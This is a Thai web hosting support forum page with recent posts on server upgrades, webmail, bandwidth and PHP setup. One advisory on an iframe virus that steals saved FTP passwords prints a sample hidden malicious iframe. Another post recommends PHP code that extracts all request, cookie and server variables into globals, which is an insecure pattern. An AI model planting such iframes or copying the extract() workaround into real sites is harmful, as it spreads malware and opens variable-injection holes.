ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน
ส่งอีเมล์ยืนยันการใช้งาน?

» Enter Pinkkeyhost Website «

เว็บโฮสติ้ง Pinkkeyhost :: Support Center
Pinkkeyhost
หน้า: 1 2 3 4 5 6 7 8 9 10
 1 
 เมื่อ: 18 ม.ค. 2010 08:21 
เริ่มโดย PinkkeyHost - กระทู้ล่าสุด โดย PinkkeyHost

DateTime: 16/01/10 0.15-4.00

Upgrade Apache 1.3 to 2.2.14
Upgrade PHP 4.2 to 5.2.12

This is the big upgrade across apache and php version series.

Sory for downtime.

Best Regards,
Korakot E.
Pinkkeyhost Support

 2 
 เมื่อ: 16 ต.ค. 2009 06:44 
เริ่มโดย PinkkeyHost - กระทู้ล่าสุด โดย PinkkeyHost

แค่เปิดเว็บที่ถูกฝัง iframe ด้วย Firefox หรือ IE ก็ติดทันทีเลยครับ
ขนาดว่ามี antivirus และมันก็ขึ้นข้อความเตือนด้วยว่าพบไฟล์ trojan ใน temp ขึ้นมาติดๆกัน 4 ครั้ง เปลี่ยนชื่อไปเรื่อยๆ แล้วก็เงียบไป
ก็นึกว่าคงไม่มีอะไร ผ่านไป 4 ชม กลับมาเช็ค ftp log ปรากฎว่าโดนไปหลาย user เลย (เป็น user ของผมเอง ที่เก็บ password ไว้ใน filezilla แต่ไม่ได้เปิดโปรแกรม)
ตอนนี้เลยลบ user ใน filezilla ออกไว้ก่อน แล้วก็เปลี่ยน password ใหม่หมด
ดูจาก log โดนไป 4 user จาก 8 user ที่เก็บไว้ ดีว่าเครื่องนั้นไม่ค่อยได้ใช้เลยมี account save ไว้น้อย
น่าจะเป็น trojan ตัวใหม่ที่ antivirus ยังไม่รู้จัก

สรุปตอนนี้ไม่ว่าเปิดด้วย IE หรือ Firefox ถ้าใช้ Windows ก็เสี่ยงเหมือนกันหมด


ข้อมูลและการระบาดเกี่ยวกับ Virus iFrame
1. เครื่อง user เปิดเว็บที่ถูกแทรก iframe แล้วทำให้เครื่องติดไวรัส
2. ไวรัสทำการขโมยรหัสผ่าน ftp ไป (มีทั้งดักจับจากการรับส่งข้อมูลตอน login ftp และเอาไฟล์ config ของโปรแกรม ftp ที่ save ไว้ในเครื่องไป)
3. เว็บที่ถูกขโมยรหัสผ่านก็จะถูกเข้ามาแก้ไขไฟล์ index และ/หรือ ไฟล์ .php .html (เกือบ)ทั้งหมด โดยแทรก iframe เรียกไฟล์ไวรัสเพิ่มเข้าไป และ/หรือ มีการเอาไฟล์มาวางเพื่อการต่างๆ เช่นส่ง spam เมล์
4. คนที่เปิดเว็บที่ถูกฝัง iframe ติดไวรัสโดยไม่รู้ตัว ( = ข้อ1 )

การทำงานของ virus เท่าที่พบจะมี 2 แบบคือ
1. แก้ไขไฟล์ index .php .html .htm แทรก code iframe เพื่อกระจายไวรัส ที่พบมีอยู่หลายรูปแบบ ตัวอย่าง
โค๊ด:
<iframe src="http://a1b.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>
โค๊ด:
<script  unescapechar(....

โดยจะเพิ่มหลัง tag <body> หรือ ต้นไฟล์ หรือ บรรทัดสุดท้าย

2. วางไฟล์ใน cgi-bin เพื่อส่ง spam เมล์ออกไปจำนวนมาก ซึ่งจะมีผลเฉพาะกับเว็บที่เปิด cgi ไว้ ที่พบบ่อยคือ dark.cgi

การตรวจสอบ
เวลาเปิดเว็บโปรแกรม antivirus จะแจ้งเตือน หรือถ้าเปิดด้วย firefox อาจจะพบเป็นหน้าถูก block reported attrack site สีแดงๆ (แต่ถ้าโดนฝัง virus ตัวใหม่ที่ antivirus ยังไม่ update ก็จะติดทันที)
view source ดูจะพบว่ามีการแทรก code iframe ตามตัวอย่างด้านบน


การป้องกันและแก้ไข
1. ติดตั้งโปรแกรม antivirus และหมั่น update data อย่างสม่ำเสมอ
2. หากติดแล้วให้หาโปรแกรมมาฆ่า หรือหากฆ่าไม่ได้ก็จำเป็นต้องลง windwos ใหม่
3. ไม่ save รหัสผ่าน ftp ไว้ในโปรแกรม ftp โดยเฉพาะ filezilla
4. ถ้าติดแล้วให้หาเครื่องที่ปลอดภัยเปลี่ยนรหัสผ่าน user ที่ติดไวรัสใหม่
5. เมื่อถูกแทรก script ให้แก้ไขเอา code ที่แทรกออกให้หมด
6. ถ้าเป็นไปได้ให้ใช้ Linux หรือ OSX แทน windows
7. เลี่ยงการใช้โปรแกรม crack ประเภท keygen เพราะมักมี trojan แฝงมาด้วย

 3 
 เมื่อ: 28 มี.ค. 2009 18:34 
เริ่มโดย PinkkeyHost - กระทู้ล่าสุด โดย itnangrong
สร้างไฟล์ PDF ง่ายๆด้วย " Pdf Redirect " เป็น  FreeWare


สามารถดาวน์โหลดได้จากลิ้งค์นี้ได้อีกแห่งครับ
http://itnangrong.kasate.com/modules.php?name=Forums&file=viewtopic&t=159#281

 4 
 เมื่อ: 26 มี.ค. 2009 03:50 
เริ่มโดย bikaw - กระทู้ล่าสุด โดย bikaw
ปัญหานี้สามรกแก้ได้หลายกรณีนะครับ

1.คือตอนสร้างฐานข้อมูล จะต้องเลือก utf8_unicode_ci ตรงช่อง การเรียงลำดับ

2.หากท่านใดไม่ต้องการสร้างฐานข้อมูลใหม่(หรือเริ่มทำใหม่แต่ต้นนั้นแหละ)ท่าสามสารถเข้าไปแก้ฐานข้อมูลใหม่ได้แต่ผมไม่แน่ใจนะครับว่าแก้ยังไง ตามรูปอะครับ ถ้าแก้ได้ก็ดีนะครับ แต่หากแก้ไม่ได้คงต้อง สร้างกันใหม่ ลองหาวิธีกันดูนะครับ  ลองดูรูปนี้ครับ

http://www.uppicth.com/show.php?filex=918659c97fc9c0a81cb0671480d0717a.jpg

 5 
 เมื่อ: 18 มี.ค. 2009 21:03 
เริ่มโดย net - กระทู้ล่าสุด โดย PinkkeyHost

ไม่ทราบว่าเป็น webmail ของทางโฮสเราหรือไม่ครับ เพราะจากการตรวจสอบเว็บเมล์ของทางโฮสสามารถใช้งานภาษาไทยได้เป็นปกติครับ

 6 
 เมื่อ: 18 มี.ค. 2009 11:45 
เริ่มโดย net - กระทู้ล่าสุด โดย net
สวัสดี

         พอดีใช้ Uebimiau แต่ไม่สามารถใช้งาน ภาษาไทย ได้เลย  ทำไง ดี อ่านภาษาไทยก็ไม่ได้ Theme ภาษาไทยก็ไม่ได้ พอ Log in ไป ก็ Error แนะนำหน่อยครับ แก้ไขไงดีครับ

ขอบคุณครับ

 7 
 เมื่อ: 19 ธ.ค. 2008 21:00 
เริ่มโดย Ayanami - กระทู้ล่าสุด โดย PinkkeyHost
สามารถแลก Disk Space เป็น BW ได้ครับ
http://www.pinkkeyhost.com/pub/modules/mypages/view.php?page=12

ในเบื้องต้นแนะนำให้ขยับไปเป็น cms-300 ก่อน
แล้วเอาพื้นที่มาแลกเป็น BW อีกทีครับ

ยังไงรบกวนติดต่อทาง email ได้เลยครับ

 8 
 เมื่อ: 18 ธ.ค. 2008 22:47 
เริ่มโดย Ayanami - กระทู้ล่าสุด โดย Ayanami
คือตอนนี้ผมใช้ แพคเกจ CMS-200 อยู่ เรื่อง Disk space นั้นไม่มีปัญหาแต่ เรื่อง Bandwidth ชักเริ่มไม่พอเพราะคนเริ่มเข้าเว็บมากขึ้น ผมอยากทราบว่าถ้าจะขอ Customize แพคเกจเองจะได้มั้ยครับ

และถ้าได้ ผมอยากได้ Disk space เท่าเดิมแต่เพิ่มแค่ Bandwidth เป็นซัก 20 GB ส่วน SQL database นั้นไม่ต้องการเพิ่มแต่อย่างใด จะมีการคิดราคาอย่างไรครับ

ป.ล. ขอราคาเป็น ต่อปีนะครับ

 9 
 เมื่อ: 10 ธ.ค. 2008 01:14 
เริ่มโดย ameyy - กระทู้ล่าสุด โดย ameyy
พึ่งเริ่มหัดใช้ PHP คะ
พอลงเสร็จ เริ่มสร้าง database เรียบร้อยแล้ว
แต่การเข้า http://localhost/phpMyAdmin/  มันไม่ถาม user และ password คะ
ไม่ทราบต้องทำยังไงคะ รึว่าต้องไปแก้ที่ไหน
รบกวนช่วยบอกด้วยนะคะ Sad Huh?

 10 
 เมื่อ: 03 ก.ย. 2008 12:08 
เริ่มโดย PinkkeyHost - กระทู้ล่าสุด โดย panatdapo
อ้างจาก: PinkkeyHost ที่ 07 ก.ค. 2006 20:56
สำหรับค่า Register_Global นั้น เพื่อความปลอดภัยของระบบโดยรวม
ทางโฮสได้ตั้งค่า default ไว้ที่ off สำหรับทุกๆ user

ซึ่งโดยทั่วไปแล้วจะสามารถใช้งาน script สำเร็จรูปทั่วๆไปได้อย่างไม่มีปัญหาใดๆ
อย่างไรก็ดีมี script บางตัวที่ยังจำเป็นต้องใช้ register_globals on จึงจะสามารถทำงานได้

ดังนั้น หากสมาชิกท่านใดมีความจำเป็นต้องใช้ script ที่ต้องการ register_globals on
สามารถติดต่อฝ่าย support เพื่ิอให้แก้ไขค่าจาก off เป็น on ให้กับท่านได้

ซึ่งการตั้งค่า on นี้จะมีผลกับทุกๆ domain ทั้งหมดภายใต้ user account ของท่าน
แต่จะไม่มีผลกับ user อื่นๆ ซึ่งยังคงใช้ค่าเป็น off ตาม default ของทางโฮส

อย่างไรก็ดีสำหรับผู้ที่พัฒนาระบบขึ้นเองควรที่จะรองรับ register_globals=off ได้อยู่แล้ว
ซึ่งสามารถแก้ไขระบบให้รองรับได้ง่ายๆตามนี้

หลักการคือ
1. ตรวจสอบค่า register_globals ก่อนหากเป็น on ก็ไม่ต้องทำอะไร
2. extract ตัวแปล GET POST COOKIE SESSION SERVER โดยตรวจสอบก่อนว่ามีค่าส่งเข้ามา
โดยการแก้ไข script โดยเพิ่ม code ต่อไปนี้ที่ต้นไฟล์ .php ทุกไฟล์

โค๊ด:
$globals_test = @ini_get('register_globals');
if ( isset($globals_test) && empty($globals_test) ) {
   $types_to_register = array('GET', 'POST', 'COOKIE', 'SESSION', 'SERVER');
   foreach ($types_to_register as $type) {
      $arr = @${'_' . $type};
      if (@count($arr) > 0)
         extract($arr, EXTR_SKIP);
   }
}
หรือเขียนแีกแบบหนึ่งก็ได้เช่นกัน
โค๊ด:
$globals_test = @ini_get('register_globals');
if ( isset($globals_test) && empty($globals_test) ) {
   if ( !empty($_GET) ) { extract($_GET, EXTR_SKIP); }
   if ( !empty($_POST) ) { extract($_POST, EXTR_SKIP); }
   if ( !empty($_COOKIE) ) { extract($_COOKIE, EXTR_SKIP); }
   if ( !empty($_SESSION) ) { extract($_SESSION, EXTR_SKIP); }
   if ( !empty($_SERVER) ) { extract($_SERVER, EXTR_SKIP); }
}

ซึ่งสำหรับการปรับแก้ไม่จำเป็นต้องเพิ่ม code ในต้นไฟล์ทุกไฟล์ครับ
เพียงแค่ไล่ดูว่าระบบ include ไฟล์ใหนทุกครั้ง แล้วไปเพิ่มแค่ในไฟล์ที่ถูก include เท่านั้นก็ได้แล้ว
ส่วนมากจะเป็นไฟล์ config.php หรือไม่ก็ function.php
เช่นระบบ smeweb สามารถแก้ไขได้โดยการเพิ่ม code ใน config.php เพียงไำฟล์เดียวระบบก็สามารถทำงานได้ทันที เนื่องจากทุกไฟล์ต้อง include ไฟล์ config.php เสมอ
อย่างไรก็ดีการแก้ไขดังกล่าวยังไม่ครอบคลุมถึงการ upload ไฟล์ผ่านตัวแปล $_FILES ซึ่งต้องแก้ไขในส่วนของการ upload ไฟล์ใน code ด้วย

สำหรับระบบ smeWeb ทางเวบได้ทำการแก้ไขและเปิดให้ download แล้ว
และได้ส่งให้กับผู้พัฒนาแล้ว คาดว่าเวอร์ชั่นถัดไปจะรองรับ register_global=off โดยไม่ต้องแก้ไขเพิ่มเติม


อย่างไรก็ดีการแก้ไขดังกล่าวยังไม่ครอบคลุมถึงการ upload ไฟล์ผ่านตัวแปล $_FILES ซึ่งต้องแก้ไขในส่วนของการ upload ไฟล์ใน code ด้วย

คือพอดีต้องการ upload ไฟล์ผ่านตัวแปล $_FILES ต้องแก้ไข Code ยังงัยบ้างเหรอค่ะ 

หน้า: 1 2 3 4 5 6 7 8 9 10
PinkkeyHost.com - บริการ เว็บโฮสติ้ง จดโดเมน Co-Location & Dedicated Server

reduce website downtime
Powered by SMF 1.1.16 | SMF © 2006-2007, Simple Machines | Thai language by ThaiSMF
XHTML | CSS | Aero79 design by Bloc
หน้านี้ถูกสร้างขึ้นภายในเวลา 0.058 วินาที กับ 15 คำสั่ง